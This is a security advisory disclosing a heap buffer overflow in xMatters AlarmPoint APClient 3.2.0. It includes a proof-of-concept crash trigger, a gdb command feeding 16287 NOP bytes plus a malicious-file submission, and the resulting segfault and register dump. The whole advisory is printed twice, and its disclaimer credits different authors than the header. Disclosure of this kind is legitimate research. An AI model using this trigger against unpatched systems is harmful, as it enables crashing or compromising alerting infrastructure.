#Authored by Juan Sacco
Information
--------------------
Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
Version: APClient 3.2.0 (native)
Software : xMatters AlarmPoint
Vendor Homepage : http://www.xmatters.com
Vulnerability Type : Heap Buffer Overflow
Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
Severity : High
Description
------------------
The AlarmPoint Java Server consists of a collection of software
components and software APIs designed to provide a flexible and
powerful set of tools for integrating various applications to
AlarmPoint.
Details
-------------------
AlarmPoint APClient is affected by a Heap Overflow vulnerability in
version APClient 3.2.0 (native)
A heap overflow condition is a buffer overflow, where the buffer that
can be overwritten is allocated in the heap portion of memory, generally
meaning that the buffer was allocated using a routine such as the POSIX
malloc() call.
https://www.owasp.org/index.php/Heap_overflow
Exploit as follow:
Submit a malicious file cointaining the exploit
root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
./APClient.bin --submit-file maliciousfile.hex
or
(gdb) run `python -c 'print "\x90"*16287'`
Starting program:
/opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
'print "\x90"*16287'`
Program received signal SIGSEGV, Segmentation fault.
0x0804be8a in free ()
(gdb) i r
eax 0xa303924 170932516
ecx 0xbfb8 49080
edx 0xa303924 170932516
ebx 0x8059438 134583352
esp 0xbfff3620 0xbfff3620
ebp 0xbfff3638 0xbfff3638
esi 0x8059440 134583360
edi 0x80653f0 134632432
eip 0x804be8a 0x804be8a <free+126>
eflags 0x210206 [ PF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Solution
-------------------
No patch are available at this time.
Information
--------------------
Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
Version: APClient 3.2.0 (native)
Software : xMatters AlarmPoint
Vendor Homepage : http://www.xmatters.com
Vulnerability Type : Heap Buffer Overflow
Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
Severity : High
Description
------------------
The AlarmPoint Java Server consists of a collection of software
components and software APIs designed to provide a flexible and
powerful set of tools for integrating various applications to
AlarmPoint.
Details
-------------------
AlarmPoint APClient is affected by a Heap Overflow vulnerability in
version APClient 3.2.0 (native)
A heap overflow condition is a buffer overflow, where the buffer that
can be overwritten is allocated in the heap portion of memory, generally
meaning that the buffer was allocated using a routine such as the POSIX
malloc() call.
https://www.owasp.org/index.php/Heap_overflow
Exploit as follow:
Submit a malicious file cointaining the exploit
root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
./APClient.bin --submit-file maliciousfile.hex
or
(gdb) run `python -c 'print "\x90"*16287'`
Starting program:
/opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
'print "\x90"*16287'`
Program received signal SIGSEGV, Segmentation fault.
0x0804be8a in free ()
(gdb) i r
eax 0xa303924 170932516
ecx 0xbfb8 49080
edx 0xa303924 170932516
ebx 0x8059438 134583352
esp 0xbfff3620 0xbfff3620
ebp 0xbfff3638 0xbfff3638
esi 0x8059440 134583360
edi 0x80653f0 134632432
eip 0x804be8a 0x804be8a <free+126>
eflags 0x210206 [ PF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Solution
-------------------
No patch are available at this time.
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information